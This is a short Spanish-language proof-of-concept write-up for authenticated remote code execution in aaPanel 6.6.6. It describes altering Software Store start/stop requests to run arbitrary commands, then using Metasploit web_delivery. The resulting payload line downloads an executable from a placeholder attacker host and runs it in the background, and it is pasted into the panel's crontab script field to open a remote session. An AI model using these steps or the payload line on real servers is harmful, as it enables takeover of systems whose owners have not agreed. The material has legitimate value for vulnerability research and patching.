
aapanel 6.6.6 - (Authenticated) Remote Code Execution
Para hacer este PoC, simplemente instalé el software usando docker-compose
Vaya a Software Store, haga clic en cualquier fila del campo de configuración, intercepte la solicitud cuando haga clic en "start/stop/restart" y modifique/edite la solicitud para ejecutar lo que quiera. Aquí tiene un ejemplo con curl:
Para hacer este PoC, instalé una Ubuntu 20.04 limpia, luego instalé wget + sudo y ejecuté este script wget -O install.sh http://www.aapanel.com/script/install-ubuntu_6.0_en.sh && sudo bash install.sh
En primer lugar, configura las opciones de web_delivery; esto creará un payload y un listener.
Ahora ejecútalo
esto generará el siguiente payload:
wget -qO wt8v00sC --no-check-certificate http://xxxx:8088/gUVn1orp; chmod +x wt8v00sC; ./wt8v00sC& disown
Luego copia/pega esto en script content del menú crontab en aapanel.
Ahora solo ejecuta tu crontab y espera tu sesión.
Simplemente ejecuta msfconsole -r aapanel.rc, copia/pega el payload en la sección script content y disfruta de tu sesión.